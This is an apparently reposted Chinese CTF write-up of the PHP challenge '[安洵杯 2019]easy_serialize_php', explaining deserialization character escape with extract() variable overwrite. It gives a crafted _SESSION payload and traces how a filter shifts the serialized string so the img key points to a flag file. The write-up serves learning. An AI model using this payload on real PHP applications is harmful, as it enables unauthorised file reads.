码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 反序列化字符逃逸漏洞之


    参考:[安洵杯 2019]easy_serialize_php_甜筒化了 -的博客-CSDN博客_easy_serialize_php

    知识点:

    extract()变量覆盖

    反序列化字符逃逸;

    什么意思呢,就是说当进行反序列化数组的时候,只认前面一个括号里面的内容;例如;

    1. $b='a:1:{s:2:"ei";s:5:"fjksj";}';
    2. var_dump(unserialize($b)) ;
    3. $c='a:1:{s:2:"ei";s:5:"fjksj";}dfjhgksaasdhgerakdj'; //在后面添加了一些干扰字符
    4. var_dump(unserialize($c)) ;

    结果:

    结果是不变的;

    那么如果当序列化后的字符串经过一些函数过滤掉一些字符会发生什么呢;因为序列化后的字符是按照要求严格执行的,什么意思,就是s:1:"a" ; 这个1指得是字符串长度,它会自动往后面截取;

    所以通过这两个规则利用起来就可以构造我们想要的东西;

    这就是反序列化字符逃逸;

    和变量覆盖怎么用?

    变量覆盖是直接将之前的值取代,这里就可以作为 键逃逸;没有变量覆盖就值逃逸;

    至于构造过程参考上述 :

    键逃逸:

    _SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

     这里构造出来的session字典值就只有一个,就是

    flagphp->;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

    然而当经过

    1. if(!$_GET['img_path']){
    2. $_SESSION['img'] = base64_encode('guest_img.png');
    3. }else{
    4. $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
    5. }

    之后增加了img->base64_encode('guest_img.png');

    此时serialize($_SESSION)的值就是:

    a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

    但是经过

    filter(serialize($_SESSION));

    就会把第一个flagphp吃掉;

    所以变为:
    a:2:{s:7:"";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

     再经过反序列化之后最后的";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}就会被忽略掉;

    这就改变了session的键值:
    ";s:48:  ——>a

    img——>ZDBnM19mMWFnLnBocA==

    直接改变img不就可以了嘛!!!

  • 相关阅读:
    关系型数据库存储多维指标数据
    Day10-Java进阶-泛型&数据结构(树)&TreeSet 集合
    Seata AT模式源码解析一(Seata Server端启动流程)
    Disqus 有评论但没显示的一种解决方案
    【服务器数据恢复】IBM服务器RAID控制器出错的数据恢复案例
    Node.js阶段学习(一)
    ConfigurationManager姿势快闪
    基础讲解——ES6
    35的程序员被辞了可以自己接外包啊?为什么都那么悲观呢?
    html picture元素
  • 原文地址:https://blog.csdn.net/qq_58970968/article/details/126005136
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号